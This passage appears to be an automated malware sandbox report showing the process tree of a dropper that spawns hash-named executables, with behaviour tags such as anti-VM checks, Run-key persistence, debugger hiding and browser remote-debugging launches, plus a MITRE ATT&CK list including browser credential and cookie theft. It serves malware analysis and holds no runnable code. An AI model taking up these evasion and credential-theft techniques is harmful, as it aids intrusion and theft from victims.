      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3436,i,7530160685075713003,13338648554720202954,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3460 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:1912
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4216,i,7530160685075713003,13338648554720202954,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4520 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:2724
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4712,i,7530160685075713003,13338648554720202954,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4748 /prefetch:8
      4⤵
      PID:2340
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4756,i,7530160685075713003,13338648554720202954,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4700 /prefetch:8
      4⤵
      PID:2028
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4544,i,7530160685075713003,13338648554720202954,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5020 /prefetch:8
      4⤵
      PID:4864
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5032,i,7530160685075713003,13338648554720202954,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5040 /prefetch:8
      4⤵
      PID:1352
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    PID:4532
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff8e99f46f8,0x7ff8e99f4708,0x7ff8e99f4718
      4⤵
      Checks processor information in registry
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      PID:4964
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,14481451082899705275,15620051576044217656,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:2
      4⤵
      PID:2792
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1996,14481451082899705275,15620051576044217656,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4284
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1996,14481451082899705275,15620051576044217656,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2892 /prefetch:8
      4⤵
      PID:1412
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,14481451082899705275,15620051576044217656,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2572 /prefetch:2
      4⤵
      PID:864
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1996,14481451082899705275,15620051576044217656,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:1656
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1996,14481451082899705275,15620051576044217656,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
      4⤵
      Uses browser remote debugging
      PID:3992
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,14481451082899705275,15620051576044217656,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2568 /prefetch:2
      4⤵
      PID:5088
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,14481451082899705275,15620051576044217656,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2116 /prefetch:2
      4⤵
      PID:3828
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,14481451082899705275,15620051576044217656,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2604 /prefetch:2
      4⤵
      PID:2628
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,14481451082899705275,15620051576044217656,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3256 /prefetch:2
      4⤵
      PID:1440
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,14481451082899705275,15620051576044217656,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3300 /prefetch:2
      4⤵
      PID:100
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,14481451082899705275,15620051576044217656,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4180 /prefetch:2
      4⤵
      PID:4032
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,14481451082899705275,15620051576044217656,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4164 /prefetch:2
      4⤵
      PID:900

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2856

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4076

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:1844

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1904 -ip 1904
1⤵
PID:1676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5100 -ip 5100
1⤵
PID:744

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1800 -ip 1800
1⤵
PID:1604

C:\Users\Admin\Desktop\c9aa76ae7576d3068d8e5c7fcee11a0b0623e3ff79a53c50061a0cf449f46670.exe
"C:\Users\Admin\Desktop\c9aa76ae7576d3068d8e5c7fcee11a0b0623e3ff79a53c50061a0cf449f46670.exe"
1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:4868
- C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\x8b75.exe
  C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\x8b75.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  PID:1136
- - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1M25d5.exe
    C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1M25d5.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2440
- - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2b1895.exe
    C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2b1895.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:4060
- C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3H13t.exe
  C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3H13t.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:3868

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1084

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /0
1⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2388

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4892 -ip 4892
1⤵
PID:4672

C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\1087772021\am_no.cmd
1⤵
- Opens file in notepad (likely ransom note)
PID:1628

C:\Users\Admin\AppData\Local\Temp\1088046001\588e9c47e5.exe
"C:\Users\Admin\AppData\Local\Temp\1088046001\588e9c47e5.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 7272 -ip 7272
1⤵
PID:8068

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5760

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
- Executes dropped EXE
PID:6132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 6464 -ip 6464
1⤵
PID:6552

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:7020

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Modify Authentication Process

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

Modify Authentication Process

Modify Registry

Pre-OS Boot

T1542

Bootkit

T1542.003

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

System Information Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion